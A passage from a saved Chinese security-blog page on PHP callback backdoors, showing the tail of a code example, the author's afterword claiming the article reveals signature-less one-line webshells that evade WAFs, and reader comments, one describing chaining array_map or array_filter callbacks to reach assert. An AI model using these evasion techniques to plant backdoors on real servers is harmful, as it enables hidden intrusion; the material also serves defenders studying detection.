class="variable">$iterator</code> <code class="keyword">as</code> <code class="variable">$item</code><code class="plain">) {</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>3</code></td><td class="content"><code class="spaces">&nbsp;&nbsp;&nbsp;&nbsp;</code><code class="functions">echo</code> <code class="variable">$item</code><code class="plain">;</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>4</code></td><td class="content"><code class="plain">}</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; 这里也是借用了create_function来创建回调函数。但有些同学就问了，这里创建的回调函数只有一个参数呀？实际上这里如果传入assert，是会报错的，具体原因自己分析。
<p>
	<br>
</p>
<p>
	<strong>0x09 后记</strong> 
</p>
<p>
	&nbsp; &nbsp; 这一篇文章，就像一枚核武器，爆出了太多无特征的一句话后门。我知道相关厂商在看了文章以后，会有一些小动作。不过我既然敢写出来，那么我就敢保证这些方法是多么难以防御。
</p>
<p>
	&nbsp; &nbsp; 实际上，回调后门是灵活且无穷无尽的后门，只要php还在发展，那么就有很多很多拥有回调函数的后门被创造。想要防御这样的后门，光光去指哪防哪肯定是不够的。
</p>
<p>
	&nbsp; &nbsp; 简单想一下，只有我们去控制住assert、preg_replace这类函数，才有可能防住这种漏洞。
</p>            </div>
            <div itemprop="keywords" class="tags-meta">标签: 	<a href="https://www.leavesongs.com/tag/webshell">webshell</a>	<a href="https://www.leavesongs.com/tag/WAF%E7%BB%95%E8%BF%87">WAF绕过</a>	<a href="https://www.leavesongs.com/tag/%E5%9B%9E%E8%B0%83%E5%90%8E%E9%97%A8">回调后门</a></div>
            <div style="display:none;">et_highlighter51</div>            <ul class="pagetion clearfix"><li class="nav-prev">上一篇：<a href="https://www.leavesongs.com/PENETRATION/fanwe-o2o-demo-website-getshell.html">那些年我拿下的demo站之方维O2O</a></li><li class="nav-next">下一篇：<a href="https://www.leavesongs.com/HTML/sina-jsonp-hijacking-csrf-worm.html">分享一个jsonp劫持造成的新浪某社区CSRF蠕虫</a></li></ul>   
<!--MOB SHARE BEGIN-->
<div class="-mob-share-ui-button -mob-share-open">分享</div>
<div class="-mob-share-ui -mob-share-initialized -mob-share-ui-theme" style="display: block; visibility: hidden; left: 0px; top: 0px;">
    <ul class="-mob-share-list" style="transition-property: all; transition-duration: 0s; top: 0px;">
        <li class="-mob-share-weibo -mob-share-initialized" style="margin: 0px; top: 420.5px; left: 921.5px; position: absolute;" data-mob-share-center-top="420.5px" data-mob-share-center-left="921.5px"><p>新浪微博</p></li>
        <li class="-mob-share-qzone -mob-share-initialized" style="margin: 0px; top: 420.5px; left: 921.5px; position: absolute;" data-mob-share-center-top="420.5px" data-mob-share-center-left="921.5px"><p>QQ空间</p></li>
        <li class="-mob-share-qq -mob-share-initialized" style="margin: 0px; top: 420.5px; left: 921.5px; position: absolute;" data-mob-share-center-top="420.5px" data-mob-share-center-left="921.5px"><p>QQ好友</p></li>
        <li class="-mob-share-weixin -mob-share-initialized" style="margin: 0px; top: 420.5px; left: 921.5px; position: absolute;" data-mob-share-center-top="420.5px" data-mob-share-center-left="921.5px"><p>微信</p></li>
        <li class="-mob-share-douban -mob-share-initialized" style="margin: 0px; top: 420.5px; left: 921.5px; position: absolute;" data-mob-share-center-top="420.5px" data-mob-share-center-left="921.5px"><p>豆瓣</p></li>
        <li class="-mob-share-facebook -mob-share-initialized" style="margin: 0px; top: 420.5px; left: 921.5px; position: absolute;" data-mob-share-center-top="420.5px" data-mob-share-center-left="921.5px"><p>Facebook</p></li>
        <li class="-mob-share-twitter -mob-share-initialized" style="margin: 0px; top: 420.5px; left: 921.5px; position: absolute;" data-mob-share-center-top="420.5px" data-mob-share-center-left="921.5px"><p>Twitter</p></li>
        <li class="-mob-share-pocket -mob-share-initialized" style="margin: 0px; top: 420.5px; left: 921.5px; position: absolute;" data-mob-share-center-top="420.5px" data-mob-share-center-left="921.5px"><p>Pocket</p></li>
        <li class="-mob-share-google -mob-share-initialized" style="margin: 0px; top: 420.5px; left: 921.5px; position: absolute;" data-mob-share-center-top="420.5px" data-mob-share-center-left="921.5px"><p>Google+</p></li>
        <li class="-mob-share-youdao -mob-share-initialized" style="margin: 0px; top: 420.5px; left: 921.5px; position: absolute;" data-mob-share-center-top="420.5px" data-mob-share-center-left="921.5px"><p>有道云笔记</p></li>
        <li class="-mob-share-mingdao -mob-share-initialized" style="margin: 0px; top: 420.5px; left: 921.5px; position: absolute;" data-mob-share-center-top="420.5px" data-mob-share-center-left="921.5px"><p>明道</p></li>
        <li class="-mob-share-tumblr -mob-share-initialized" style="margin: 0px; top: 420.5px; left: 921.5px; position: absolute;" data-mob-share-center-top="420.5px" data-mob-share-center-left="921.5px"><p>Tumblr</p></li>
        <li class="-mob-share-instapaper -mob-share-initialized" style="margin: 0px; top: 420.5px; left: 921.5px; position: absolute;" data-mob-share-center-top="420.5px" data-mob-share-center-left="921.5px"><p>Instapaper</p></li>
        <li class="-mob-share-linkedin -mob-share-initialized" style="margin: 0px; top: 420.5px; left: 921.5px; position: absolute;" data-mob-share-center-top="420.5px" data-mob-share-center-left="921.5px"><p>LinkedIn</p></li>
    </ul>
    <div class="-mob-share-close">取消</div>
</div>
<div class="-mob-share-ui-bg" style="display: none;"></div>	
<script id="-mob-share" src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/mob-share.js.下载"></script>
<!--MOB SHARE END--> 

            <div class="qqlist">
              <h3>订阅本站<small>(RSS)</small></h3>
              <form method="post" target="_blank" action="https://list.qq.com/cgi-bin/qf_compose_send">
              <input type="hidden" value="qf_booked_feedback" name="t">
              <input type="hidden" value="dace5c2b356504de449e7f3fc2bb59f3f6124d6563786446" name="id">
              <input type="text" placeholder="E-mail" value="" class="rsstxt" name="to" id="to">
              <button type="submit">订阅→</button>
              </form>
            </div>     


        </div>
        <!-- 评论位置 -->
        <div id="comments" class="comments">
    	<h3>已有 5 条评论</h3>
    <ol class="comment-list">
    <a name="comments"></a><li class="comment-body" id="comment-1525">
		<a name="1525"></a>
		<div class="clearfix">
		<div class="comment-author">
				<img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/d41d8cd98f00b204e9800998ecf8427e"></div><div class="comment-meta">
			<div class="fn">阿狗</div>
			<p>哈哈，想当初回调后门日便天下无敌手~~</p>
            <span class="comment-time">时间: 2015-08-07 16:23</span> 
            <span class="comment-reply"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#comment-1525" onclick="commentReply(1525,this)">回复</a></span>
            </div>
        </div><div class="comment-children"><ol class="comment-list"></ol>
    <div id="pagenavi"></div></div></li><li class="comment-body" id="comment-1524">
		<a name="1524"></a>
		<div class="clearfix">
		<div class="comment-author">
				<img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/dc3c0fb0ec6a09bec2c7c15f7042f3ef"></div><div class="comment-meta">
			<div class="fn"><a href="http://wys.me/" target="_blank">wys.me</a></div>
			<p>专业了，低头掳过~~</p>
            <span class="comment-time">时间: 2015-08-02 17:56</span> 
            <span class="comment-reply"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#comment-1524" onclick="commentReply(1524,this)">回复</a></span>
            </div>
        </div><div class="comment-children"><ol class="comment-list"></ol>
    <div id="pagenavi"></div></div></li><li class="comment-body" id="comment-1512">
		<a name="1512"></a>
		<div class="clearfix">
		<div class="comment-author">
				<img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/e22d50da2cd56c03c6fc6889c86c96bf"></div><div class="comment-meta">
			<div class="fn">广东硅谷学院</div>
			<p>#广东硅谷学院#学好IT好就业选硅谷IT，学技能拿文凭事半功倍，紧跟专业教师一起冲浪IT行业。我们有建设学习型专业师资团队，教师领跑学生紧随其后。qq:800015777.&nbsp;&nbsp;电话:88989555.【广东硅谷学院热招2015年高考毕业生:http://www.sve.com.cn】</p>
            <span class="comment-time">时间: 2015-07-24 20:57</span> 
            <span class="comment-reply"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#comment-1512" onclick="commentReply(1512,this)">回复</a></span>
            </div>
        </div><div class="comment-children"><ol class="comment-list"></ol>
    <div id="pagenavi"></div></div></li><li class="comment-body" id="comment-1511">
		<a name="1511"></a>
		<div class="clearfix">
		<div class="comment-author">
				<img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/d41d8cd98f00b204e9800998ecf8427e"></div><div class="comment-meta">
			<div class="fn">仙剑之鸣</div>
			<p>很强大，比我免杀库全。
<br>我想说，二参不一定要 PHP5.4.及以上的assert，array_map,array_filter这不都是二参么？回调时，做两次回调，这样就又能调到assert，如此即可兼容所有php了。。。</p>
            <span class="comment-time">时间: 2015-07-24 12:00</span> 
            <span class="comment-reply"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#comment-1511" onclick="commentReply(1511,this)">回复</a></span>
            </div>
        </div><div class="comment-children"><ol class="comment-list"></ol>
    <div id="pagenavi"></div></div></li><li class="comment-body" id="comment-1506">
		<a name="1506"></a>
		<div class="clearfix">
		<div class="comment-author">
				<img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/66c81a4f074b40e9acbfd284493c4e81"></div><div class="comment-meta">
			<div class="fn"><a href="http://www.92af.com/" target="_blank">af</a></div>
			<p>有点长哈，收藏起来。</p>
            <span class="comment-time">时间: 2015-07-20 16:44</span> 
            <span class="comment-reply"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#comment-1506" onclick="commentReply(1506,this)">回复</a></span>
            </div>
        </div><div class="comment-children"><ol class="comment-list"></ol>
    <div id="pagenavi"></div></div></li><div id="pagenavi"></div>    </ol>
    <div id="pagenavi">
            </div>

        <div id="comment-place">
    <div id="comment-post" class="respond none-resize">
        <div class="cancel-comment-reply">
        <a href="javascript:void(0);" onclick="cancelReply()" id="cancel-reply">取消回复</a>
        </div>
     <div id="respond">
    	<h3 id="response">添加新评论</h3>
    	<form method="post" action="https://www.leavesongs.com/index.php?action=addcom" id="comment-form" role="form">
                		<p>
                <label for="author" class="required">称呼</label>
    			<input type="text" name="comname" maxlength="49" id="author" class="text" value="" required="">
    		</p>
    		<p>
                <label for="mail">Email</label>
    			<input type="email" name="commail" id="mail" class="text" value="">
    		</p>
    		<p>
                <label for="url">网站</label>
    			<input type="url" name="comurl" id="url" class="text" placeholder="http://" value="">
    		</p>
                		<p>
                <label for="textarea" class="required">内容</label>
                <textarea rows="8" cols="50" name="comment" id="textarea" class="textarea" required=""></textarea>
            </p>
                        <p>
                <label style="float:left;">验证码</label>
                </p><div style="float:left;">
                    <script type="text/javascript" src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/get.php"></script>                </div>
                <div style="clear:both;"></div>
            <p></p>
                		<p>
                <button type="submit" class="submit">提交评论</button>
                <input type="hidden" name="pid" id="comment-pid" value="0" size="22" tabindex="1">
                <input type="hidden" name="gid" value="223">
            </p>
    	</form>
        </div>
    </div>
    </div>
    </div>
      
    </div>
    <div class="col-5 columns" id="sidebar" role="complementary">
    <div class="widget widget_search">
    <h3>搜索</h3>
    <form action="https://www.leavesongs.com/" id="searchform" method="get">
        <input type="text" id="searchkey" name="keyword" value="" class="searchkey" placeholder="Search...">
        <button type="submit" id="searchsubmit">Go</button>
    </form>
    </div>
	<div class="widget widget-category">
	<h3>分类</h3>
	<ul id="blogsort" class="widget-list"><li><a href="https://www.leavesongs.com/sort/C">C/C++<em>32</em></a></li><li><a href="https://www.leavesongs.com/sort/SHARE">资源分享<em>12</em></a></li><li><a href="https://www.leavesongs.com/sort/PENETRATION">网络安全<em>80</em></a></li><li><a href="https://www.leavesongs.com/sort/SOFT">软件<em>4</em></a></li><li><a href="https://www.leavesongs.com/sort/OTHERLAN">其他语言<em>46</em></a></li><li><a href="https://www.leavesongs.com/sort/THINK">心得与体会<em>9</em></a></li></ul>
	</div>
	<div class="widget widget-tag">
	<h3>最热标签</h3>
	<div class="tag-cloud"><a rel="tag" href="https://www.leavesongs.com/tag/XDCTF" title="3 篇文章">XDCTF</a><a rel="tag" href="https://www.leavesongs.com/tag/sqlite" title="6 篇文章">sqlite</a><a rel="tag" href="https://www.leavesongs.com/tag/0day" title="3 篇文章">0day</a><a rel="tag" href="https://www.leavesongs.com/tag/%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E" title="8 篇文章">上传漏洞</a><a rel="tag" href="https://www.leavesongs.com/tag/WAF%E7%BB%95%E8%BF%87" title="4 篇文章">WAF绕过</a><a rel="tag" href="https://www.leavesongs.com/tag/python" title="12 篇文章">python</a><a rel="tag" href="https://www.leavesongs.com/tag/nginx" title="3 篇文章">nginx</a><a rel="tag" href="https://www.leavesongs.com/tag/%E6%B5%8F%E8%A7%88%E5%99%A8" title="4 篇文章">浏览器</a><a rel="tag" href="https://www.leavesongs.com/tag/CSRF%E6%BC%8F%E6%B4%9E" title="6 篇文章">CSRF漏洞</a><a rel="tag" href="https://www.leavesongs.com/tag/%E5%8A%A0%E5%AF%86" title="3 篇文章">加密</a><a rel="tag" href="https://www.leavesongs.com/tag/Mysql" title="3 篇文章">Mysql</a><a rel="tag" href="https://www.leavesongs.com/tag/fliter" title="4 篇文章">fliter</a><a rel="tag" href="https://www.leavesongs.com/tag/%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E" title="10 篇文章">注入漏洞</a><a rel="tag" href="https://www.leavesongs.com/tag/emlog" title="5 篇文章">emlog</a><a rel="tag" href="https://www.leavesongs.com/tag/%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C" title="3 篇文章">文件操作</a><a rel="tag" href="https://www.leavesongs.com/tag/C-FREE" title="3 篇文章">C-FREE</a><a rel="tag" href="https://www.leavesongs.com/tag/%E6%B8%97%E9%80%8F" title="6 篇文章">渗透</a><a rel="tag" href="https://www.leavesongs.com/tag/%E4%BD%8D%E8%BF%90%E7%AE%97" title="3 篇文章">位运算</a><a rel="tag" href="https://www.leavesongs.com/tag/Jquery" title="5 篇文章">Jquery</a><a rel="tag" href="https://www.leavesongs.com/tag/API%E5%87%BD%E6%95%B0" title="4 篇文章">API函数</a><a rel="tag" href="https://www.leavesongs.com/tag/%E5%87%BD%E6%95%B0" title="5 篇文章">函数</a><a rel="tag" href="https://www.leavesongs.com/tag/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E" title="3 篇文章">命令执行漏洞</a><a rel="tag" href="https://www.leavesongs.com/tag/%E4%B8%89%E4%B8%AA%E7%99%BD%E5%B8%BD" title="4 篇文章">三个白帽</a><a rel="tag" href="https://www.leavesongs.com/tag/%E8%99%9A%E6%8B%9F%E6%9C%BA" title="3 篇文章">虚拟机</a><a rel="tag" href="https://www.leavesongs.com/tag/writeup" title="4 篇文章">writeup</a><a rel="tag" href="https://www.leavesongs.com/tag/gh0st" title="4 篇文章">gh0st</a><a rel="tag" href="https://www.leavesongs.com/tag/%E5%AF%8C%E6%96%87%E6%9C%AC" title="3 篇文章">富文本</a><a rel="tag" href="https://www.leavesongs.com/tag/webshell" title="5 篇文章">webshell</a><a rel="tag" href="https://www.leavesongs.com/tag/getshell" title="6 篇文章">getshell</a><a rel="tag" href="https://www.leavesongs.com/tag/%E8%BF%9C%E6%8E%A7" title="4 篇文章">远控</a></div>
	</div><div class="widget">
	<h3 class="widget-title">微语</h3>
	<ul class="widget-list widget-twitter" id="twitter"> <!-- id=newcomment --><li class="clearfix"><a href="https://www.leavesongs.com/t/">博客有种尾大不掉的感觉了，想移到hexo，心有余而力不足呀。。。</a> </li><li class="clearfix"><a href="https://www.leavesongs.com/t/">处理了博客几个bug和漏洞</a> </li><li class="clearfix"><a href="https://www.leavesongs.com/t/">lnmp这次更新好赞，不禁又想用了~</a> </li><li class="clearfix"><a href="https://www.leavesongs.com/t/">想想以前转移/备份服务器的时候傻傻地打包，然后ftp/http下载，再解压，现在用了rsync没想到这么简单，一条命令就好了。果然是生活总往简单容易地方向在走。</a> </li><li class="clearfix"><a href="https://www.leavesongs.com/t/">每每想到自己并没有什么值得我骄傲的开源项目，就捶胸顿足地遗憾。这也是我这一年的首要任务了。</a> </li></ul>
	</div><div class="widget widget-recent-entries">
	<h3 class="widget-title">热门日志</h3>
	<ul id="hotlog" class="widget-list"><li><a href="https://www.leavesongs.com/PHP/phpdelfile.html">php遍历目录&amp;删除指定文件中指定内容</a></li><li><a href="https://www.leavesongs.com/THINK/banjia.html">博客搬家成功</a></li><li><a href="https://www.leavesongs.com/PENETRATION/vps-pentest.html">对自己VPS的一次安全检测</a></li><li><a href="https://www.leavesongs.com/C/CGIforC_1.html">C语言CGI编程入门(一)</a></li><li><a href="https://www.leavesongs.com/C/gh0st_2.html">gh0st源码分析与远控的编写(二)</a></li></ul>
	</div>
	<div class="widget">
	<h3>订阅本站</h3>
	<ul>
	<a href="https://www.leavesongs.com/rss.php" target="_blank">RSS订阅</a>
	</ul>
	</div>
</div></div>
<div id="footer">
	<!-- copyright -->
	<div class="container">
		<div class="row remove-bottom">				
			<div class="col-6 columns">
			<h3>Little About</h3>
			<p>Phithon 非强迫症小青年  <br>
现居先 <br>
爱好：种花、买书、收藏明信片 <br>
欢迎各大组织收留 <br>
E-mail：root@leavesongs.com </p>
			</div>

			<div class="col-10 columns">

				<h3 class="mobile-hide">Follow me</h3>
        <div id="social-links">
          <a href="http://weibo.com/101yx" class="sweibo" target="_blank" title="新浪微博">新浪微博</a>
          <a href="javascript:alert(/没有腾讯微博哟/)" class="qweibo" target="_blank" title="腾讯微博">腾讯微博</a>
          <a href="javascript:alert(/墙外有什么/);window.open(&#39;http://google.com&#39;)" class="google" target="_blank" title="墙外的世界">google+</a>
          <a href="https://github.com/phith0n" class="github" target="_blank" title="Github">github</a>
          <a href="javascript:confirm(/mailto:root#leavesongs.com/)" class="mail" target="_blank" title="私信给我">私信给我</a>
          <a href="https://www.leavesongs.com/rss.php" target="_blank" class="rss" title="RSS订阅">RSS订阅</a>
        </div>						
        <div class="bot-line"></div>
				<p class="copyright">
	Copyright ©2016 由 <a href="http://www.emlog.net/">Emlog</a> 强力驱动				<i>Designed and built with all the love in the world by <a href="http://www.leavesongs.com/" target="_blank">Phithon</a> &amp;&amp; deepsky </i>
				<!-- Piwik -->
<script type="text/javascript">
  var _paq = _paq || [];
  _paq.push(['trackPageView']);
  _paq.push(['enableLinkTracking']);
  (function() {
    var u="//stat.leavesongs.com/";
    _paq.push(['setTrackerUrl', u+'piwik.php']);
    _paq.push(['setSiteId', 1]);
    var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];
    g.type='text/javascript'; g.async=true; g.defer=true; g.src=u+'piwik.js'; s.parentNode.insertBefore(g,s);
  })();
</script>
<noscript>&lt;p&gt;&lt;img src="//stat.leavesongs.com/piwik.php?idsite=1" style="border:0;" alt="" /&gt;&lt;/p&gt;</noscript>
<!-- End Piwik Code -->				</p>
			</div>
		</div>
	</div>
	<!-- /copyright -->
</div>
<a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#" id="go-top">Top ↑</a>
<a href="https://www.leavesongs.com/sitemap.xml" rel="sitemap" style="display: none;">sitemap</a><link href="./创造tips的秘籍——PHP回调后门 - 离别歌_files/highslide.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/highslide.js.下载"></script>
<script type="text/javascript">
    hs.graphicsDir = "https://www.leavesongs.com/content/plugins/kl_highslide/highslide/graphics/";
    hs.outlineType = "rounded-white";
    jQuery(function($){$("a[href$=jpg],a[href$=gif],a[href$=png],a[href$=jpeg],a[href$=bmp]").addClass("highslide").each(function(){this.onclick=function(){return hs.expand(this)}});})
</script>
<script src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/jquery.appear.js.下载"></script>
<script src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/config.js.下载"></script>
<script type="text/javascript" src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/jquery.pageslide.min.js.下载"></script><div id="pageslide" style="display: none;"></div>
<a id="more-game" href="javascript:$.pageslide({ speed: 300, direction: &#39;right&#39;, href:&#39;//www.leavesongs.com/content/templates/deep/self.html&#39; })">More</a>
<script type="text/javascript">
function isMobile() {
  var check = false;
  (function(a){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))check = true})(navigator.userAgent||navigator.vendor||window.opera);
  return check;
}
function hitokoto(data){
    if (data.hitokoto) {
        $("#blog_info").text(data.hitokoto);
    };
}
$(document).ready(function(){
    var m = isMobile();
    if (window.localStorage && !m) {
        if (window.localStorage['show'] != 'ok'){
            $.pageslide({ speed: 300, direction: 'right', href:'//www.leavesongs.com/content/templates/deep/self.html' });
            window.localStorage['show'] = 'ok';
        }
    };
    if (m) {
        $("#sidebar").hide(0);
        $("#mainbody").removeClass("col-11").addClass("col-16");
    }
    //$.getScript('https://assets.leavesongs.com/rand?encode=jsc&charset=utf-8')
});
</script>



<div style="position: static; width: 0px; height: 0px; border: none; padding: 0px; margin: 0px;"><div id="trans-tooltip"><div id="tip-left-top" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-left-top.png&quot;);"></div><div id="tip-top" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-top.png&quot;) repeat-x;"></div><div id="tip-right-top" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-right-top.png&quot;);"></div><div id="tip-right" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-right.png&quot;) repeat-y;"></div><div id="tip-right-bottom" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-right-bottom.png&quot;);"></div><div id="tip-bottom" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-bottom.png&quot;) repeat-x;"></div><div id="tip-left-bottom" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-left-bottom.png&quot;);"></div><div id="tip-left" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-left.png&quot;);"></div><div id="trans-content"></div></div><div id="tip-arrow-bottom" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-arrow-bottom.png&quot;);"></div><div id="tip-arrow-top" style="background: url(&quot;chrome-extension://ikkbfngojljohpekonpldkamedehakni/imgs/map/tip-arrow-top.png&quot;);"></div></div><div class="highslide-container" style="padding: 0px; border: none; margin: 0px; position: absolute; left: 0px; top: 0px; width: 100%; z-index: 1001; direction: ltr;"><a class="highslide-loading" title="点击取消" href="javascript:;" style="position: absolute; top: -9999px; opacity: 0.75; z-index: 1;">正在载入...</a><div style="display: none;"></div><table cellspacing="0" style="padding: 0px; border: none; margin: 0px; visibility: hidden; position: absolute; border-collapse: collapse; width: 0px;"><tbody style="padding: 0px; border: none; margin: 0px;"><tr style="padding: 0px; border: none; margin: 0px; height: auto;"><td style="padding: 0px; border: none; margin: 0px; line-height: 0; font-size: 0px; background: url(&quot;https://www.leavesongs.com/content/plugins/kl_highslide/highslide/graphics/outlines/rounded-white.png&quot;) 0px 0px; height: 20px; width: 20px;"></td><td style="padding: 0px; border: none; margin: 0px; line-height: 0; font-size: 0px; background: url(&quot;https://www.leavesongs.com/content/plugins/kl_highslide/highslide/graphics/outlines/rounded-white.png&quot;) 0px -40px; height: 20px; width: 20px;"></td><td style="padding: 0px; border: none; margin: 0px; line-height: 0; font-size: 0px; background: url(&quot;https://www.leavesongs.com/content/plugins/kl_highslide/highslide/graphics/outlines/rounded-white.png&quot;) -20px 0px; height: 20px; width: 20px;"></td></tr><tr style="padding: 0px; border: none; margin: 0px; height: auto;"><td style="padding: 0px; border: none; margin: 0px; line-height: 0; font-size: 0px; background: url(&quot;https://www.leavesongs.com/content/plugins/kl_highslide/highslide/graphics/outlines/rounded-white.png&quot;) 0px -80px; height: 20px; width: 20px;"></td><td class="rounded-white highslide-outline" style="padding: 0px; border: none; margin: 0px; position: relative;"></td><td style="padding: 0px; border: none; margin: 0px; line-height: 0; font-size: 0px; background: url(&quot;https://www.leavesongs.com/content/plugins/kl_highslide/highslide/graphics/outlines/rounded-white.png&quot;) -20px -80px; height: 20px; width: 20px;"></td></tr><tr style="padding: 0px; border: none; margin: 0px; height: auto;"><td style="padding: 0px; border: none; margin: 0px; line-height: 0; font-size: 0px; background: url(&quot;https://www.leavesongs.com/content/plugins/kl_highslide/highslide/graphics/outlines/rounded-white.png&quot;) 0px -20px; height: 20px; width: 20px;"></td><td style="padding: 0px; border: none; margin: 0px; line-height: 0; font-size: 0px; background: url(&quot;https://www.leavesongs.com/content/plugins/kl_highslide/highslide/graphics/outlines/rounded-white.png&quot;) 0px -60px; height: 20px; width: 20px;"></td><td style="padding: 0px; border: none; margin: 0px; line-height: 0; font-size: 0px; background: url(&quot;https://www.leavesongs.com/content/plugins/kl_highslide/highslide/graphics/outlines/rounded-white.png&quot;) -20px -20px; height: 20px; width: 20px;"></td></tr></tbody></table></div></body></html>